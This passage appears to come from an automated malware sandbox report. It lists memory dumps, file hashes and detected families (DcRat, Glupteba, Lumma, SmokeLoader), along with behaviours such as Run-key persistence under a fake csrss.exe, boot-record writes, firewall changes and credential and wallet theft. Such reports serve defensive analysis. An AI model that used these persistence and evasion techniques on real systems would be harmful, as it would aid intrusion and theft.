memory/2060-337-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2848-342-0x00000000025B0000-0x00000000029A8000-memory.dmp

memory/2848-345-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1628-346-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1204-351-0x000000001B200000-0x000000001B4E2000-memory.dmp

memory/1204-352-0x0000000001D50000-0x0000000001D58000-memory.dmp

memory/1204-353-0x000007FEF4B50000-0x000007FEF54ED000-memory.dmp

memory/1204-354-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/1204-355-0x00000000025F4000-0x00000000025F7000-memory.dmp

memory/1204-357-0x000007FEF4B50000-0x000007FEF54ED000-memory.dmp

memory/1204-356-0x00000000025FB000-0x0000000002662000-memory.dmp

memory/1204-358-0x000007FEF4B50000-0x000007FEF54ED000-memory.dmp

memory/1488-359-0x0000000000400000-0x00000000022D9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

MD5 b03886cb64c04b828b6ec1b2487df4a4
SHA1 a7b9a99950429611931664950932f0e5525294a4
SHA256 5dfaa8987f5d0476b835140d8a24fb1d9402e390bbe92b8565da09581bd895fc
SHA512 21d1a5a4a218411c2ec29c9ca34ce321f6514e7ca3891eded8c3274aeb230051661a86eda373b9a006554e067de89d816aa1fa864acf0934bbb16a6034930659

\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

MD5 147b6aa5bd0222e5d58af8984b073c56
SHA1 399923e38ba252bffbe5c13b39bcbf41798e15f5
SHA256 6a2447d974f6eeaaa5ad420a24faa13417df7ebd5c76d0b872a11183d29c5bd9
SHA512 c0002076c0eed73addcaee17d389293eee9b462d02187944ad7c5a5235b78265257efc958473d91bd5e63f3b0a8ed7ed166a550f311c348170914620da519d70

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

MD5 b29cd31f15d37cebbe2804adc62ce2e9
SHA1 e036f370e3b9a849609823c1cf295c07968b91a0
SHA256 082ab87e967c75809e40fab5cdfd97aa48c3827b52e26188d9fabfadd5da4bf2
SHA512 2a031213cadf534acf2ef564937fa6102f7103d91513498c0c4dfef4f3056a1f568e7db70ef9ad817e75117dbead7b0f5e4e8bf59767f026ca09831f321860f4

memory/2620-375-0x0000000000E60000-0x0000000000E68000-memory.dmp

memory/1488-377-0x0000000002410000-0x0000000002510000-memory.dmp

memory/2620-374-0x0000000019B20000-0x0000000019E02000-memory.dmp

memory/2620-378-0x000007FEF4980000-0x000007FEF531D000-memory.dmp

memory/2620-380-0x0000000001110000-0x0000000001190000-memory.dmp

memory/2620-381-0x000007FEF4980000-0x000007FEF531D000-memory.dmp

memory/2620-382-0x0000000001110000-0x0000000001190000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 7c277165dcead3616b33d9432afcb485
SHA1 b725f0009bb07f8c3f434adc10ccc8d78967ea62
SHA256 a3548e60aee3eacd24068a097a0fd848bf9d61a19e54a88068b5be7539384c30
SHA512 2f5d098b0ca693dc399479f293ce38b0254149481dcc397715cff47a55b870c2a3ae7824cc1587838ce0f511633fecc961384e836bbccde66734207d1f5e8105

\Windows\rss\csrss.exe

MD5 8968359e460df9992c18c113c1c17674
SHA1 1370811cb82506f311c9ea7564df9a0029bd2265
SHA256 da196e9c74d5f55018e8b34e506f8d15dafaff07ad297215139e28bc2f11f07c
SHA512 cc9ce4a2cf680d5bf9945ee00600877e4a28a940888e6e9db90b431469f2a926fb386a4cb98243d60da4ad52353088d156a6815b1335e6b9077ed04a13e9f7d3

memory/2520-394-0x00000000002D0000-0x0000000000D7D000-memory.dmp

memory/2848-396-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2620-398-0x0000000001110000-0x0000000001190000-memory.dmp

memory/2620-399-0x000007FEF4980000-0x000007FEF531D000-memory.dmp

memory/2788-407-0x0000000002780000-0x0000000002B78000-memory.dmp

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

MD5 029a5147d2f0d080800b095d06298a55
SHA1 6d53b0c00f128318d23de9db082989e30369baad
SHA256 cd1818fa6f2a4cbdd75985ba9e36c6141d206f5728b994875c3af7c874938566
SHA512 b035c22bd7b41375cff69882f696d37f8167c12a770da3f6d919d1350789bd1f1d4cfc623fe325c696b3f30e96632bbd1233cdff878df05e8c5b7a153f3c9e1c

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-27 01:44

Reported

2024-02-27 01:46

Platform

win10v2004-20240226-en

Max time kernel

94s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\F84C.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

SmokeLoader

trojan backdoor smokeloader

Creates new service(s)

persistence

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\375C.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\F84C.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\AppData\Local\Temp\FACE.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 924 set thread context of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\4901.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\4901.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\4901.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SYSTEM32\schtasks.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4901.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DBO77.tmp\723.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
